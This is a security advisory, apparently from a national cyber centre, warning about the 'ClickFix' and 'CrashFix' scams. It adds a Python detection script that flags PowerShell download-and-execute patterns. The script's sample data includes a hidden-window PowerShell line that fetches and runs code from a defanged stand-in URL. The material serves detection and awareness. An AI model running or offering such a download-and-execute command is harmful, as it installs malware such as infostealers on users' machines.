24.02.2026 - The NCSC is currently seeing a rise in reports involving the "ClickFix" infection method. In these cases, people are misled by fake technical problems into manually inserting and running malicious code via their computer's command line. This approach bypasses technical security measures by effectively authorising the infection of their own systems.
The "ClickFix" scam relies on social engineering. The name suggests a quick "fix" for a technical problem offered through a simple "click". Attackers exploit poorly secured websites or use online advertisements to lead people to malicious pages. When you visit the page, a convincing overlay or pop-up appears.
The message displayed states that a technical problem has occurred, such as a failed browser update, a DNS error or an issue with displaying content. The most common pretext is a request to solve an alleged CAPTCHA. A button is displayed to "fix" the issue.
From the browser to the command line
People often fail to realise that simply opening the website copies a malicious PowerShell command (on Windows) or Terminal command (on macOS) to the clipboard. They are then instructed to use seemingly harmless keyboard shortcuts. In reality, these shortcuts open the command line and paste the previously copied code. Pressing Enter immediately executes the command and downloads malware.
Potential impact
Once executed, the script attempts to connect to a server and download a malicious program. While direct malware downloads are often blocked by antivirus software, in this case, the download command is issued by the user themselves within their own permissions context. Consequently, many security mechanisms do not raise an alert. In most cases, an infostealer is installed. This type of malware specialises in extracting passwords from browsers, emptying crypto wallets, and stealing session cookies. These cookies enable attackers to access accounts (such as email or corporate systems) without a password. In corporate environments, this can be the first step towards a later ransomware attack.
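As an added detection example (not NCSC code), the following Python sketch triages process-creation events for the pattern described above. It assumes Windows telemetry that records the parent process, image and command line, and that the pasted command is started from the desktop shell (explorer.exe); the field names, indicator list and sample events are constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
INDICATORS = {
    "download": re.compile(
        r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
        r"downloadstring|downloadfile|start-bitstransfer)\b", re.I),
    "runs downloaded text": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden window": re.compile(r"-w\w*\s+hidden\b", re.I),
}

def score_event(event):
    """Return the list of indicators for one process-creation event."""
    if basename(event["image"]).lower() not in SHELLS:
        return []
    if basename(event["parent"]).lower() != "explorer.exe":
        return []  # services, schedulers and IDEs are out of scope here
    return [name for name, rx in INDICATORS.items() if rx.search(event["cmd"])]

def triage(events, threshold=2):
    """Yield (event, indicators) for events with at least `threshold` hits."""
    for event in events:
        hits = score_event(event)
        if len(hits) >= threshold:
            yield event, hits

# Constructed sample events (not real telemetry); the URL is defanged.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"user": "alice", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": 'powershell -w hidden -c "iwr hxxps://example[.]invalid/fix | iex"'},
    {"user": "bob", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": PS},  # user simply opened PowerShell: no indicators
    {"user": "SYSTEM", "parent": r"C:\Windows\System32\services.exe", "image": PS,
     "cmd": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"user": "carol", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "cmd": "firefox.exe"},
]

if __name__ == "__main__":
    for event, hits in triage(SAMPLE_EVENTS):
        print(f"review: user={event['user']} indicators={hits} cmd={event['cmd']}")
```

The threshold of two indicators keeps an ordinary interactive PowerShell session from being flagged; tune it and the indicator list against your own baseline.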
An expanded approach: "CrashFix"
Additional approaches have emerged since the beginning of the year. One of these is "CrashFix". This scam method involves distributing manipulated browser extensions disguised as useful tools, such as ad blockers. These extensions are programmed to crash the browser deliberately after a delay. When the browser is restarted, a message appears, prompting the user to "repair" the alleged error by entering specific commands. In reality, these commands are used to install malware.
Recommendations
- Be sceptical of any website that claims your browser needs updating or that an error can only be fixed by running commands. Official browser updates are handled via the browser's built-in settings, not via a website.
- Never copy and paste code or commands from a source you do not know directly into PowerShell, Terminal or the command prompt.
- Do not install software from unknown sources.
- Raise awareness of this specific scam among staff. One of the most effective protective measures is knowing that a website would never legitimately ask someone to manually enter system commands.
- In corporate environments, check whether PowerShell script execution can be restricted for standard users.
- If you have fallen victim to such an attack, report the incident.
Last modification 24.02.2026



